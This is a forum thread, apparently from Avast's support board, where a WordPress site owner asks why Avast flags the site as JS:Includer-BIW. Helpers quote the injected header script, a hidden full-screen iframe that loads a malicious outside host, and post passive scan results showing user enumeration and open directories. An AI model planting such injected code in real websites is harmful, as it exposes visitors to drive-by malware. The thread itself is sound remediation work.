Website with Infection: JS:Includer-BIW

Hi guys,

Would appreciate your help, for some reason, my website, www.luthiershands.com was blocked by avast with the following results:

http://www.luthiershands.com/|{gzip}
Infection: JS:Includer-BIW [Trj]

I just accessed it yesterday without problems; google scan, malware scan and even bluehost do not detect any malware on the site, and I can’t find anything suspicious in either the code or the file structure… any help would be appreciated!

Killmalware killmalware.com/www.luthiershands.com/

Sucuri https://sitecheck.sucuri.net/results/luthiershands.com/

You may report it to avast lab https://support.avast.com > avast virus lab

Hi

Was found in the header

!--screen-modes analyzer--> 
sc​ript  type="text/javascript"> if (i2336 == null) { var i2336 = 1; window.status='Done'; document.w​rite('< DIV id=check524 style=" display: none "> < if​rame src="hxxp://ossnet-vriliski.surgeryideas.org/fo​rums/search.php?keywords=67310&fid0=wp1nsigwl1" width="'+screen.width+'" height="'+screen.height+'"> ​< /if​rame> < /DIV> '); window.status='Done'; } < / sc​ript > 
< !--/screen-modes analyzer-->

which contained a redirection is blocked by Avast.

Edited

Website is on an exploit’s blocklist, see: http://toolbar.netcraft.com/site_report?url=http://www.luthiershands.com
Netcraft Website Risk Status 1 red oiut of 10.
Wordpress Version 4.1 based on: http://www.luthiershands.com/wp-includes/js/autosave.js
WordPress theme: http://www.luthiershands.com/wp-content/themes/spacious/
WordPress Version
4.2.3
Version is current
Found in META Generator TagWordPress Plugins
The following plugins were detected by reading the HTML source of the WordPress sites front page.

add-to-any latest release (1.6.2)
https://www.addtoany.com/
lightbox latest release (1.5.1)
http://huge-it.com/lightbox
jetpack latest release (3.6.1)
http://wordpress.org/plugins/jetpack/
bamboo-columns latest release (1.6)
http://www.bamboosolutions.co.uk/wordpress/bamboo-columns
right-click-disable-orignal latest release (1.0)
http://yashfale.in/wp-content/uploads/2014/09/rightclickdisable.zip
jellyfish-counter-widget latest release (1.4.4)
http://strawberryjellyfish.com/wordpress-plugins/jellyfish-counter/
easy-table latest release (1.5.2)
http://takien.com/
widgetize-pages-light latest release (1.15)
http://otwthemes.com/
ss-downloads latest release (1.5)
http://www.strangerstudios.com/wordpress-plugins/ss-downloads/
newsletter latest release (3.8.5)
http://www.thenewsletterplugin.com/plugins/newsletter
contact-form-7 latest release (4.2.2)
http://contactform7.com/
Plugins are a source of many security vulnerabilities within WordPress installations, always keep them updated to the latest version available and check the developers plugin page for information about security related updates and fixes.

There are likely more plugins installed than those listed here as the detection method used here is passive. While these results give an indication of the status of plugin updates, a more comprehensive assessment should be undertaken by brute forcing the plugin paths using a dedicated tool. Of course if you have access to the admin panel you can view the plugin status on the plugin page.
WordPress Theme
The theme has been found by examining the path /wp-content/themes/ theme name /

Spacious 1.2.4http://themegrill.com/themes/spacious

Warning User Enumeration is possible
The first two user ID’s were tested to determine if user enumeration is possible.

User ID 1 : admin
User ID 2 : None
It is recommended to rename the admin user account to reduce the chance of brute force attacks occurring. As this will reduce the chance of automated password attackers gaining access. However it is important to understand that if the author archives are enabled it is usually possible to enumerate all users within a WordPress installation.

Only the first two user ID’s were tested with this scan, use the Nmap NSE enumeration scripts (use your own Nmap installation or try option 2 below) to discover additional user ID’s.

Warning Directory Indexing Enabled
In the test we attempted to list the directory contents of the uploads and plugins folders to determine if Directory Indexing is enabled. This is an information leakage vulnerability that can reveal sensitive information regarding your site configuration or content.

/wp-content/uploads/ enabled
/wp-content/plugins/ enabled
Directory indexing was tested on the /wp-content/uploads/ and /wp-content/plugins/ directores. Note that other directories may have this web server feature enabled, so ensure you check other folders in your installation. It is good practice to ensure directory indexing is disabled for your full WordPress installation either through the web server configuration or .htaccess.

Info passive check WP Security Scan.

polonus

Also consider vulnerabilities here: Results from scanning URL: -http://www.luthiershands.com/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=4.2.2
Number of sources found: 43
Number of sinks found: 19
Results from scanning URL: -http://s0.wp.com/wp-content/js/devicepx-jetpack.js?ver=201531
Number of sources found: 18
Number of sinks found: 9
Results from scanning URL: -http://s.gravatar.com/js/gprofiles.js?ver=2015Augaa *
Number of sources found: 14
Number of sinks found: 17

This is blocked for me with uBlock Origin: -http://stats.wp.com/e-201531.js

8 Read: http://wordpress.stackexchange.com/questions/17413/removing-gravatar-com-support-for-wordpress-and-simple-local-avatars

polonus